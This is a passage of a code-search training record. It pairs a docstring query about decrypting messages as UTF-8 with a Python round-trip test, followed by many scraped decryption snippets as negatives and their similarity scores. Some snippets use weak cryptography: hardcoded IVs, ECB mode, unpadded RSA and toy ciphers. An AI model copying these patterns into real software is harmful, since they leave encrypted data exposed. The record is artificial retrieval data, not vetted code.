enc_iv)\n\n return plaintext", "def test_endecrypt():\n\n e, d, c = keygen()\n\n test_encryption(e, c)\n test_decryption(d, c)\n key_cracker(e, c)" ]
[ "0.87886894", "0.7859907", "0.7717388", "0.7570975", "0.7548102", "0.74472094", "0.735235", "0.7315939", "0.73016477", "0.7261866", "0.7248655", "0.72426134", "0.71901", "0.7162575", "0.7121405", "0.7052611", "0.7006807", "0.6988077", "0.6984153", "0.6959311", "0.6911666", "0.69018006", "0.6899753", "0.6864132", "0.68637145", "0.6855836", "0.6834609", "0.68262357", "0.682467", "0.6808882", "0.6803807", "0.67877495", "0.67758286", "0.6749758", "0.6731765", "0.67300785", "0.6726871", "0.67248994", "0.67238265", "0.6710899", "0.67099065", "0.6703613", "0.67021793", "0.6689324", "0.6682179", "0.66752", "0.66723615", "0.66508067", "0.66397834", "0.66250914", "0.66250914", "0.6619547", "0.6604124", "0.66004264", "0.6588853", "0.65864044", "0.6583607", "0.65793496", "0.6572421", "0.65723014", "0.65666366", "0.6564202", "0.65622807", "0.655343", "0.65376765", "0.6522979", "0.6521389", "0.6513537", "0.65133196", "0.6503384", "0.6500674", "0.6495827", "0.6493926", "0.6486191", "0.6481308", "0.6474536", "0.645891", "0.64560217", "0.6452325", "0.6438767", "0.6436016", "0.643382", "0.6422242", "0.64179766", "0.64175004", "0.64029133", "0.64020777", "0.6399526", "0.6388853", "0.6384196", "0.6371785", "0.6364399", "0.6360931", "0.6352964", "0.63495225", "0.63491356", "0.63412076", "0.6340102", "0.6339117", "0.6338536" ]
0.72249025
12
It decrypts encoded messages as UTF8 strings.
def test_decrypt_encoding(self):
    encrypted = encrypt('méssåge')
    decrypted = decrypt(encrypted)

    assert decrypted == 'méssåge'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decrypt_message(encrypted_message):", "def decrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"decrypt.php\",msg)) as f:\n decryptedmessage = f.read().decode('utf-8',\"strict\")\n return decryptedmessage", "def decrypt(self, data):", "def _decrypt(self, msg):\r\n # they must be real crypto experts at pubnub.com\r\n # two lines of code and two capital mistakes :-(\r\n # pylint: disable=E1101\r\n key = hashlib.sha256(self.cipher).hexdigest()[0:32]\r\n aes = AES.new(key, AES.MODE_CBC, \"0123456789012345\")\r\n decrypted = aes.decrypt(base64.decodestring(msg))\r\n return json.loads(decrypted[0:-ord(decrypted[-1])])", "def decryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n decoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code-key\n new = chr(change)\n string += new\n key += key_increment\n decoded = ''.join(string)\n return ('Decoded Message:\\t' + decoded)", "def _decrypt_string(self, event):\n _LOGGER.debug(\"Hub: Decrypt String: Original: %s\", str(event.encrypted_content))\n resmsg = self._decrypter.decrypt(unhexlify(event.encrypted_content)).decode(\n encoding=\"UTF-8\", errors=\"replace\"\n )\n _LOGGER.debug(\"Hub: Decrypt String: Decrypted: %s\", resmsg)\n event.parse_decrypted(resmsg)", "def decode_message(self, key):\n\n decoded_message = ''\n for char in self.message:\n if char.isalpha():\n decoded_char = self.convert_char(char, key)\n decoded_message = decoded_message + decoded_char\n else:\n decoded_message = decoded_message + char\n return decoded_message", "def doDecode(self):\n raise CipherError(\"override this funct and return the decoded msg\")", "def decrypt(self, message):\n output = []\n for letter in message:\n # preventing white spaces and numbers\n if letter == ' ' or isinstance(letter, int):\n output.append(letter)\n else:\n idx_in_plain = self.CIPHER_TEXT_ALPH.index(letter.upper())\n output.append(self.PLAIN_TEXT_ALPH[idx_in_plain])\n return \"\".join(output)", "def decrypted(data: str) -> str:\n\n return b64decode(data.encode('ascii')).decode('ascii')", "def decode(self):\n if self.ciphered:\n msg = self.result \n self.result = ''\n else:\n msg = self.msg\n try:\n self.result = self.doDecode(msg,self.shift)\n except Exception as e:\n raise CipherError(\"decoding failure {}.\".format(e))\n self.ciphered = False\n return self.result", "def _decode_text(self):\n\n print(f\"Hex decode; received message is {self.message}\")\n return bytes.fromhex(self.message).decode('utf-8')", "def decrypt_string(self, encrypted_string):\n return self.fernet_instance.decrypt(encrypted_string.encode('utf-8')).decode('utf-8')", "def decrypt(message: str) -> str:\n return \"\".join(REVERSE_DICT[char] for char in message.split())", "def decrypt_message(self):\r\n\r\n\t\t#Will not let user input useless messages that cannot be decrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to decrypt. 
--> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Your decrypted message is\")\r\n\t\tprint(self.my_code + \"|\")", "def decrypt_message(data,symetric_key,private_key):\n\tif type(data) == str or type(data) == bytes:\n\t\tdata = json.loads(data)\n\ttyp = data['type']\n\tnonce = data['nonce'].encode(\"iso-8859-1\")\n\tmessage = data['message'].encode(\"iso-8859-1\")\n\tnonce, *_ = decrypt(private_key,nonce)\n\tmessage = AESCCM(symetric_key).decrypt(nonce,message,None)\n\tmessage ={'type':typ,'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\treturn message", "def decipher(s, key): # s = message\n return decipher_raw(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decode(self, data):\n return self.__cipher.decrypt(data)", "def decrypt(self, key, msg, b64decode=True):\n if b64decode:\n msg = base64.b64decode(msg)\n iv = msg[:self.cipher.block_size]\n cipher = self.cipher.new(key, self.cipher.MODE_CBC, iv)\n\n padded = cipher.decrypt(msg[self.cipher.block_size:])\n l = ord(padded[-1:]) + 1\n plain = padded[:-l]\n return plain", "def decode_text():\n print(f\"{YELLOW}[{MIDDLE_DOT}]{RESET} Enter message to decode: \", end=\"\")\n message = input()\n extract_encoded_message = message.split(LEFT_TO_RIGHT_MARK)[1]\n message = extract_encoded_message\n extract_encoded_message = message.split(RIGHT_TO_LEFT_MARK)[0]\n encoded = ''\n decoded = ''\n\n for message_char in message:\n if message_char in zero_space_symbols:\n encoded = encoded + str(zero_space_symbols.index(message_char))\n\n cur_encoded_char = ''\n\n for index, encoded_char in enumerate(encoded):\n cur_encoded_char = cur_encoded_char + encoded_char\n if index > 0 and (index + 1) % padding == 0:\n decoded = decoded + chr(int(cur_encoded_char, len(zero_space_symbols)))\n cur_encoded_char = ''\n\n return decoded", "def decipher2(s, key): # s = message\n return decipher_raw2(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.decrypt(message)", "def decodeBytesUtf8Safe(self, data):\n N_bytes = len(data)\n\n decoded = \"\"\n while(N_bytes>0):\n try:\n decoded = data[:N_bytes].decode(\"utf-8\")\n except UnicodeDecodeError as ex:\n N_bytes -= 1\n else:\n break\n\n return decoded, data[N_bytes:]", "def decode(keyFile: str, string : str=\"\", inputFile: str=\"\", outputFile:str=\"\") -> str:\n print(\"Decoding message ...\")\n print(\"Is private key file ok ?\", checkKeyFile(keyFile,\"private\"))\n\n if (checkKeyFile(keyFile,\"private\")): \n f = open(keyFile)\n keyData = extractParamsFromKey(f.readlines()[1]) # read the second line of the file and extract the param\n if args.verbose : print(\"keydata (priv) :\", keyData)\n \n # get block length\n blocklen = len(str(keyData[0]))\n if args.verbose : print(\"block size is\",blocklen)\n\n # open a file if the string is empty\n if(string == \"\"):\n # transform hex to string\n string = str(base64ToHexToInt(str(readFile(inputFile))))\n else:\n # transform hex to string\n string = str(base64ToHexToInt(string))\n\n # add padding to have the 
correct length \n if (len(string) % blocklen != 0):\n if args.verbose : print(\"not the correct legnth\")\n rem = len(string) % blocklen \n if args.verbose : print(rem)\n pad = blocklen - rem\n if args.verbose : print(pad)\n string = string.zfill(len(string)+pad)\n \n blocks = wrap(string, blocklen)\n if args.verbose : print(\"encrypted bloks\", blocks)\n \n # decode for each block\n tmpDecoded = \"\"\n for i in range(len(blocks)): \n blockDecoded = str(calculateDeCrypt(blocks[i], keyData[1], keyData[0]))\n if args.verbose : print(blockDecoded)\n blockDecoded = blockDecoded.zfill(blocklen-1)\n if args.verbose : print(blockDecoded)\n tmpDecoded += blockDecoded\n if args.verbose : print(\"decrypted ints :\", tmpDecoded)\n\n # split the string into blocks\n # start bu reversing the string so we can start left to right\n tmp = tmpDecoded[::-1]\n # cut them\n blocks_ascii = wrap(tmp, 3)\n # reverse the lsit of cut\n blocks_ascii.reverse()\n # inside eecaht cut reserve the characters\n for i in range(len(blocks_ascii)):\n blocks_ascii[i] = blocks_ascii[i][::-1]\n if args.verbose : print(blocks_ascii)\n\n # make sur that every block is the corect length, overwise add padding\n for i in range(len(blocks_ascii)):\n if(len(str(blocks_ascii[i])) != 3):\n if args.verbose : print(\"adding padding for ascii\")\n blocks_ascii[i] = blocks_ascii[i].zfill(3)\n if args.verbose : print(\"blocks after padding :\", blocks_ascii)\n \n string = \"\"\n for c in blocks_ascii:\n string += chr(int(c))\n \n # write the decoded string to a file\n if(outputFile == \"\"):\n print(\"Decrypted :\")\n print(string)\n else :\n writeToFile(outputFile, string)\n return string\n else: \n print(\"keyfile is incorrect\")\n return", "def decode_str(decrypted_text: bytes, encoding: str) -> Tuple[str, str]:\n msg = ''\n out = ''\n if not encoding:\n with warnings.catch_warnings(record=True) as e:\n charset_match = from_bytes(decrypted_text)\n if len(charset_match):\n out = str(charset_match[0])\n demisto.debug(f\"Decode decrypted text using {charset_match[0].encoding} encoding\")\n if e:\n msg = f'Note: encoding detection ended with warning: {e[0].message} Characters may be missing.' 
\\\n ' You can try running this command again and pass the encoding code as argument.\\n'\n else:\n out = decrypted_text.decode(encoding)\n\n return out, msg", "def decode(self, crypto):", "def decrypt(self, msg):\n\n if type(msg) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n return self.gpg.decrypt(msg).data", "def decode_message(self, raw):\n return raw.decode('utf-8')", "def decrypt_message(encrypted_message):\r\n\r\n # conversion to bytes\r\n encrypted_message = bytes(encrypted_message, \"ascii\")\r\n\r\n # loading key\r\n key = load_key()\r\n\r\n # creating a fernet object\r\n f = Fernet(key)\r\n\r\n # decrypting the messsage\r\n decrypted_message = f.decrypt(encrypted_message)\r\n\r\n return decrypted_message.decode()", "def decrypt_message(self, encrypted_message):\n f = Fernet(bytes(self.key))\n decrypted_message = f.decrypt(encrypted_message)\n return decrypted_message", "def decrypt(self, msg):\n if self.security_type is not None and self.security_type != 0:\n res, used, _ = gss.unwrap(self.ctx, msg)\n isconf = self.security_type == gss.RequirementFlag.confidentiality\n if (not used and isconf):\n raise GSSClientError('User requested encryption, '\n 'but the server sent an unencrypted '\n 'message!')\n return res.decode('utf-8')\n else:\n return msg.decode('utf-8')", "def decode(self, s):", "def decode(self, s):", "def decrypt_str(message):\n filename = f'/tmp/{get_temp_filename()}'\n filename_encrypted = f'{filename}.pem'\n filename_plain = f'{filename}.plain'\n pem_file = open(filename_encrypted, 'w')\n pem_file.write(message)\n pem_file.close()\n cmd = [\n \"openssl\",\n \"cms\",\n \"-decrypt\",\n \"-inform\", \"PEM\",\n \"-in\", filename_encrypted,\n \"-inkey\", server_key_files[\"key\"],\n \"-recip\", server_key_files[\"crt\"],\n \"-out\", filename_plain\n ]\n res_text = \"\"\n try:\n exec_cmd(cmd)\n with open(filename_plain, \"r\") as plain:\n res_text = plain.read()\n plain.close()\n os.unlink(filename_plain)\n except (OSError, subprocess.CalledProcessError) as err:\n logging.error(\"decrypt_str failed: %s\", err)\n finally:\n os.unlink(filename_encrypted)\n\n return res_text", "def __decrypt(string: str) -> str:\n key = 171\n result = \"\"\n i: int\n for i in string:\n a = key ^ i\n key = i\n result += chr(a)\n return result", "def test_decode_messages():\n decoding1 = d.decode()\n decoding2 = s.decode_messages()\n assert decoding1 == decoding2\n decoding3 = SecretGarden(filename, \"HELLO, STUDENTS.\").decode_messages()\n assert decoding1 != decoding3", "def decodeUtf8(self, arrayBuffer):", "def decodeUtf8(self, arrayBuffer):", "def decryptToString(self, data, keyobj):\n return self.decryptByteArray(data, keyobj).decode().split('\\x00')[0]", "def decrypt(self, message):\n message = base64.b64decode(message)\n initialization_vector = message[:self._block_size]\n cipher = AES.new(self._key, AES.MODE_CBC, initialization_vector)\n raw_message = cipher.decrypt(message[self._block_size:])\n return self._remove_padding(raw_message).decode('utf-8')", "def decrypt(event=None): # event is passed by binders.\n msg = inputText.get(\"1.0\",tkinter.END)\n outText.delete('1.0', tkinter.END)\n\n decB64Msg = base64.decodestring(msg)\n\n f = open(myTmpDir + 'ct' + str(identity) + '.bin','wb')\n f.write(decB64Msg)\n f.close()\n\n os.popen(\"rsa.exe d \" + myTmpDir + \"ct\" + str(identity) + \".bin \" + myTmpDir + \"ptSender\" + str(identity) + \".bin\")\n\n with open(myTmpDir + \"ptSender\" + str(identity) + \".bin\", \"rb\") as f:\n readFile = f.read()\n # Convert 
to hex representation\n decMsg = bytes(readFile)\n\n # TODO: overwirite\n outText.insert(tkinter.END, decMsg)", "def AES_decrypt(ciphertext: bytes) -> Text:\n text = b64decode(ciphertext)\n cipher = AES.new(secret_key, mode, IV)\n return Padding.unpad(cipher.decrypt(text), bs).decode('utf-8')", "def encrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"encrypt.php\",msg)) as f:\n encryptedmessage = f.read().decode('utf-8',\"strict\")\n return encryptedmessage", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def decrypt(self, text):\n return self.encrypt(text)", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def read_message(msg_cipher: bytes, crypto: object) -> Tuple[str, str]:\n\n ciph_in = msg_cipher[:-64]\n hmac = msg_cipher[-64:].decode('utf-8')\n plaintext = crypto.decrypt(ciph_in).decode('utf-8')\n plaintext = plaintext.strip('\\0')\n return plaintext, hmac", "def decrypt(library, message):\r\n\r\n # Make lists of keys and values\r\n keys = []\r\n values = []\r\n for entry in library:\r\n entry = entry.split()\r\n keys.append(entry[1])\r\n values.append(entry[0])\r\n\r\n # Decode the message\r\n decoded = ''\r\n message = message.split()\r\n for m in range(len(message)):\r\n for k in range(len(keys)):\r\n if message[m] == keys[k]:\r\n decoded += values[k]\r\n if message[m] not in keys:\r\n decoded += '?'\r\n return decoded", "def Decrypt(self, data):\n\n data = base64.b64decode(data)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n solved = \"\"\n try:\n solved = es.decrypt(data)\n except ValueError:\n stdout.write(\"Error, corrupted file.\\n\\n\")\n return \"%errorpass:1234123412341234%\"\n\n return solved", "def de_base64(msg):\n try:\n msg_ascii = msg.encode('ascii')\n msg_bytes = base64.b64decode(msg_ascii)\n msg_decoded = msg_bytes.decode('ascii')\n return msg_decoded\n except:\n print('Invalid base64-encoded string')", "def ecb_decrypt(self, encrypted_data, color):\n msg = b''\n for d in encrypted_data:\n encoded_bytes = d[0] + d[1]\n encoded_int = self.bytes_to_int(encoded_bytes)\n decoded_int = self.power(encoded_int, self.private_key, self.N)\n decoded_byte = self.int_to_bytes(decoded_int, len(d[0]))\n msg += decoded_byte\n return msg", "def decrypt_faces(msg, nkey=key):\n newmsg = msg[:-20]\n obj = DES.new(nkey, DES.MODE_ECB)\n return obj.decrypt(newmsg)", "def cipher_feedback_mode_decode(msg, CEK, IV = int(0).to_bytes(8, 'big')):\n assert(len(CEK) == 32)\n assert(len(IV) == 8)\n last_block = IV\n res = b''\n for i in range(0, len(msg), 8):\n gamma = GOST2814789ECB_encode(last_block, CEK)\n block = msg[i: min(i + 8, len(msg))]\n decrypted_block = b''\n for j in range(len(block)):\n decrypted_block += int(block[j] ^ gamma[j]).to_bytes(1, 'big')\n res += decrypted_block\n last_block = block\n return res", "def decrypt(self, message):\n return self._keypair.decrypt(message)", "def decrypt(self, message: bytearray) -> bytearray:\n return self.__PRGA(message)", "def 
test_decrypt_encrypted(self):\n encrypted = encrypt('message')\n decrypted = decrypt(encrypted)\n\n assert decrypted == 'message'", "def decrypt(self, enc, use_base64=True, decode_text=True):\n if use_base64:\n enc = base64.b64decode(enc)\n\n decryptor = self.cipher.decryptor()\n raw = self._unpad(decryptor.update(enc) + decryptor.finalize())\n return raw.decode(\"utf-8\") if decode_text else raw", "def decrypt(ciphertext):\n base_decode = {'16': base64.b16decode,\n '32': base64.b32decode, '64': base64.b64decode}\n cleartext = ciphertext+''\n for i in range(encrypt_times):\n cleartext = base_decode[get_base(cleartext)](cleartext)\n return cleartext", "def decrypt_message(message: bytes, receiver_private_key: RsaKey) -> bytes:\n iv = message[:IV_LEN]\n enc_aes_key = message[IV_LEN:IV_LEN + receiver_private_key.size_in_bytes()] # Assume encryption has been done with same key size\n enc_message = message[IV_LEN + receiver_private_key.size_in_bytes():]\n\n cipher_rsa = PKCS1_OAEP.new(receiver_private_key)\n aes_key = cipher_rsa.decrypt(enc_aes_key)\n\n cipher_aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(cipher_aes.decrypt(enc_message), AES.block_size) # Padding have to be removed", "def decrypt_message(self, cipher):\n\t\tmessage = cipher ** self.private_key % self.hidden_primes_product\n\t\treturn message", "def decrypt(self, message):\r\n\r\n # Example string\r\n message = message.lower()\r\n # Everything we can encrypt\r\n SYMBOLS = \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\n for counter, key in enumerate(range(len(SYMBOLS))):\r\n # try again with each key attempt\r\n translated = \"\"\r\n\r\n for character in message:\r\n if character in SYMBOLS:\r\n symbolIndex = SYMBOLS.find(character)\r\n translatedIndex = symbolIndex - key\r\n\r\n # In the event of wraparound\r\n if translatedIndex < 0:\r\n translatedIndex += len(SYMBOLS)\r\n\r\n translated += SYMBOLS[translatedIndex]\r\n\r\n else:\r\n # Append the symbol without encrypting or decrypting\r\n translated += character\r\n\r\n # Output each attempt\r\n result = self.lc.checkLanguage(translated)\r\n if result:\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": True,\r\n \"Plaintext\": translated,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": f\"The rotation used is {counter}\",\r\n }\r\n # if none of them match English, return false!\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": None,\r\n }", "def test_decodeWithoutFinalASCIIShift(self):\n self.assertEqual(\n b'&AL0'.decode('imap4-utf-7'),\n u\"\\N{VULGAR FRACTION ONE HALF}\",\n )", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def unescape(msg):\n skip = False\n unescaped = bytearray()\n\n for i in range(len(msg)):\n\n if not skip and msg[i] is 0x7D:\n\n if not (i + 1) >= len(msg):\n unescaped.append(msg[i + 1] ^ 0x20)\n skip = True\n\n elif not skip:\n unescaped.append(msg[i])\n else:\n skip = False\n\n return unescaped", "def decryptstring(enc, password):\n\n dec = []\n enc = base64.urlsafe_b64decode(enc).decode()\n for i in enumerate(enc):\n key_c = password[i[0] % len(password)]\n dec_c = chr((256 + ord(i[1]) - ord(key_c)) % 256)\n dec.append(dec_c)\n return \"\".join(dec)", "def decode (self, secret_key, random_seed, message_length=math.inf):\n # seed the random number generator with the seed used to embed\n random.seed(random_seed)\n bytes_visited = {} # a dictionary of the unique bytes 
already visited\n color_offset = StegImage.color_offset # the color plane where the message exists\n recent_bits = [] # an array. each element is a single bit\n message = \"\"\n message_over = False\n character_offset = 0\n while ((len(bytes_visited) < message_length * self.binary_size) and not message_over) and len(bytes_visited) < (len(self.bytes) - 54)/3: # will try to decode one letter at a time until an error is thrown or it reaches the end of the image. (the algo has no idea when the message stops)\n index_of_byte = None\n while (index_of_byte is None or index_of_byte in bytes_visited): # if the byte is visited twice, in the embed algo, it just skips it the second time and moves on, so do the same when decoding\n index_of_byte = random.randint(self.offset, self.number_of_pixels * 3)\n index_of_byte += color_offset\n bytes_visited[index_of_byte] = True\n byte = self.binary_array[index_of_byte]\n bit = data_manipulation.get_bit_from_byte(byte, self.binary_size - 1) # get the last bit of the byte\n recent_bits.append(bit)\n\n if len(recent_bits) == StegImage.binary_size: # if an entire byte is stored:\n # attempt to decrypt\n try:\n letter = EncryptString.decrypt(recent_bits, secret_key, character_offset = character_offset) # if this throws an error, assume the end of the message has been reached\n # a letter has been successfully decrypted if it reaches this point\n message += letter\n character_offset += 1 # another character in the message has been found\n recent_bits = []\n except:\n # print(\"The end of the message has been reached or the message was not encoded successfully/the wrong decode parameters were given\")\n message_over = True # assume the emssage is over if an error ahs been reached\n #traceback.print_exc() # since an error is expected (a utf-8 decode error), don't print it\n\n return message", "def _decode_data(self, data):\r\n return data.decode('ISO-8859-1')", "def decrypt(self, message):\n #check validity of _private_key\n if self._private_key is None:\n raise Exception(\"invalid private key\")\n\n output = \"\"\n\n d = self._private_key[0]\n n = self._private_key[1]\n\n for i in xrange(len(ciphertext)):\n m = pow(ciphertext[i], d, n)\n output += int_to_string(m)\n return output", "def decryptor(byte_string: bytes, IV: bytes, key: bytes) -> bool:\n decrypted_string = AES_CBC_decrypt(byte_string, IV, key)\n print(len(decrypted_string), decrypted_string)\n if not check_ascii_compliance(decrypted_string):\n raise Exception(decrypted_string)", "def helper_decode(self, tokens: List[str]) -> str:\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n # We iterate over \"char\", which is supposed to be a single\n # character, because the TorchScripted version of the code\n # correctly splits a string into single characters in\n # self.utf8_chars() but the non-TorchScripted version doesn't\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)", "def decrypt(self, key, encrypted):\n output = []\n padded_key = padd_key(key, encrypted)\n for i in range(len(encrypted)):\n dec_ascii = (ord(encrypted[i]) - ord(padded_key[i])) % 256\n output.append(chr(dec_ascii))\n return ''.join(output)", "def extract_ciphertext(self):\n return b64decode(self.cipherblock[\"ciphertext\"])", "def 
test_encrypt_encoding(self):\n encrypted = encrypt('message')\n\n assert encrypted\n assert encrypted != 'message'\n assert type(encrypted) == str", "def decrypt_message(K, iv, ciphertext, tag):\n aes = Cipher(\"aes-128-gcm\")\n plain = aes.quick_gcm_dec(K, iv, ciphertext, tag)\n \n \n return plain.encode(\"utf8\")", "def decrypt(self, data):\n if not data:\n return ''\n data = self._crypt(data, self.DECRYPT)\n return self._unpad_data(data)", "def test_decode(self):\n for (input, output) in self.tests:\n self.assertEqual(input, output.decode('imap4-utf-7'))", "def decrypt_message(self, env_key, data):\n\n if not env_key or not data:\n raise Exception('Arguments missing.')\n\n key = RSA.importKey(self.private_key)\n try:\n env_key = unquote(env_key).decode('utf8')\n data = unquote(data).decode('utf8')\n except AttributeError:\n # Python 3 compatible\n env_key = unquote(env_key)\n data = unquote(data)\n\n try:\n env_key = base64.b64decode(env_key)\n data = base64.b64decode(data)\n \n cipher = PKCS1_v1_5.new(key)\n\n sentinel = []\n session_key = cipher.decrypt(env_key, sentinel)\n\n rc4_cipher = ARC4.new(session_key)\n\n xml_data = rc4_cipher.decrypt(data)\n\n # TODO: add xml validation\n # schema_root = etree.XML(xml_data)\n # schema = etree.XMLSchema(schema_root)\n # parser = etree.XMLParser(schema=schema)\n\n return xml_data\n except Exception as e:\n if self.developement:\n exception(e)\n\n raise Exception('Could not decrypt message.')", "def decrypt_caesar(ciphertext):\n return ''.join([cipher_to_plain[old] for old in ciphertext.upper()])", "async def decrypt(self, message: Message, jid: Optional[JID], tab: ChatTab):\n\n raise NotImplementedError", "def test_decode():\n enig = Enigma(534, 16, 8, [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])\n string = \"\"\"-)m>&)IKp[1`Sro$82[@_`TV&`f%}|<]a1R*\\W4IEb6j@+':`R[.(1$vV4rTJ2\n6V?5.;8q r%0p@+[Ir7-?rzIl;nV<4W7,PD[5-?;RE+~vR5-`i}>=z@S \"eJ`8g:S:1ir\nE0=<F0~/;6).\"\"\"\n decoded = \"\"\"Hello, this is a test string. I will follow this with a return\nbringing it onto a new line. I can do this forever, but I won't. 
Just\nfor a while.\"\"\"\n\n enig.setrotsettings([5, 2, 2, 7, 3, 0, 2, 3, 7, 0, 4, 2, 6, 1, 5, 5])\n assert_equal(decoded, enig.decode(string))\n\n startsettings = [4, 6, 0, 7, 3, 0, 2, 3, 7, 0, 4, 2, 6, 1, 5, 5]\n assert_equal(startsettings, enig.getrotsettings())", "def decrypt(self, input_u8):\n if self.__prev_key == self.__new_key:\n self.__randomize()\n key_map = {b:i for i, b in enumerate(self.cipher)}\n i = 0\n while i < len(input_u8):\n input_u8[i] = key_map[input_u8[i] ^ self.cipher[i%256]]\n i += 1\n return input_u8.decode(\"utf-8\")", "def decode(self, encoded):", "def _decode_encrypted_part(self, value):\n\n return encoding_utils.base64_to_bytes(value)", "def decrypt(self, buffer):\n try:\n ct = base64.b64decode(buffer)\n except:\n print('f a i l')\n return bytes('fail')\n\n cipher = AES.new(self.psk, AES.MODE_GCM, FIXED_IV)\n pt = unpad(cipher.decrypt(ct), AES.block_size)\n return pt", "def decode_kms(ciphertext_blob: str) -> str:\n try:\n import boto3\n except ImportError:\n raise ImportError(\"Missing bot3 package required for KMS.\")\n\n return boto3.client(\"kms\").decrypt(CiphertextBlob=b64decode(ciphertext_blob))[\"Plaintext\"].decode(\"utf-8\")", "def decrypt(key, encoded):\n \n if isinstance(encoded, str):\n encoded = map(ord, encoded)\n key = _key_array(key)\n aes = mxit.aes.AES()\n \n parts = _split(encoded, 16)\n decoded = []\n for part in parts:\n decoded += aes.decrypt(part, key, aes.keySize[\"SIZE_128\"]) \n return _get_text(decoded)", "def decode(b64_msg: str) -> str:\n\n b64_bytes = b64_msg.encode(\"ascii\")\n b64_bytes = base64.b64decode(b64_bytes)\n return b64_bytes.decode(\"ascii\")", "def decipher(self):\n plaintext = \"\"\n for ct, key_char in zip(self.text, self.key):\n char_index = self.char_block.rows[key_char].index(ct)\n plaintext += self.char_block.alphabet[char_index]\n print(plaintext)", "def decrypt(self, ciphertext: str) -> str:\n\n return self.run(ciphertext, Cryptography.DECRYPT)", "def decrypt(self, secret):\n return str.translate(secret, self._decoder)", "def decrypt(text, offset):\n decrypted_text = \"\"\n for char in text:\n if ord(char) <= 64:\n decrypted_character = chr(ord(char))\n elif ord(char) <= 90:\n decrypted_character = ord(char) - offset\n if decrypted_character < 65:\n decrypted_character += 26\n decrypted_character = chr(decrypted_character)\n else:\n decrypted_character = ord(char) - offset\n if decrypted_character < 97:\n decrypted_character += 26\n decrypted_character = chr(decrypted_character)\n decrypted_text += decrypted_character\n\n return decrypted_text", "def decrypt(s):\n if s is None:\n return None\n else:\n # try:\n enc_value = ast.literal_eval(s)\n private_key = serialization.load_pem_private_key(\n pkey.encode('utf-8'),\n password=None,\n backend=default_backend()\n )\n\n dec = private_key.decrypt(\n enc_value,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n return dec.decode()", "def decode_bytes(data: bytearray) -> str:\n pattern = re.compile('\\r', re.UNICODE)\n res = data.decode('utf-8', 'ignore')\n res = pattern.sub('', res)\n return res", "def decrypt(self, ciphertext):\n text = []\n # ciphertext = ciphertext.upper()\n for char in ciphertext:\n try:\n key = math_utils.mult_mod_inv(self.a, len(self.characters)) * (self.characters.index(char) - self.b) % len(self.characters)\n # If character is not in set for cipher,\n # directly append it without transformation\n except ValueError:\n text.append(char)\n else:\n 
text.append(self.characters[key])\n return ''.join(text)", "def Decrypt(self, input_bytes):\n ciph_bytes = input_bytes[keyczar.HEADER_SIZE:]\n decrypted = self.key.decrypt(ciph_bytes)\n return self.__Decode(decrypted)", "def decrypt(\r\n key: bytes,\r\n cipher_text: bytes,\r\n) -> str:\r\n block_size = 16\r\n iv = cipher_text[:block_size]\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plain_text = cipher.decrypt(cipher_text[block_size:]).decode('utf-8')\r\n return _unpad(plain_text)", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def decode_data ( data ) :\n cipher = get_cipher( data )\n index = 0\n firstpass = []\n datalen = len( data )\n while index < datalen :\n if index % 2 == 0 :\n firstpass.append( chr( ord( data[ index ] ) - cipher ) )\n else :\n firstpass.append( chr( ord( data[ index ] ) + cipher ) )\n index += 1\n\n firstpass[ 0 ] = data[ 0 ]\n firstpass[ -1 ] = data[ -1 ]\n firstpass[ -2 ] = data[ -2 ]\n decoded_data = ''.join( firstpass )\n return base64.b64decode( decoded_data )" ]
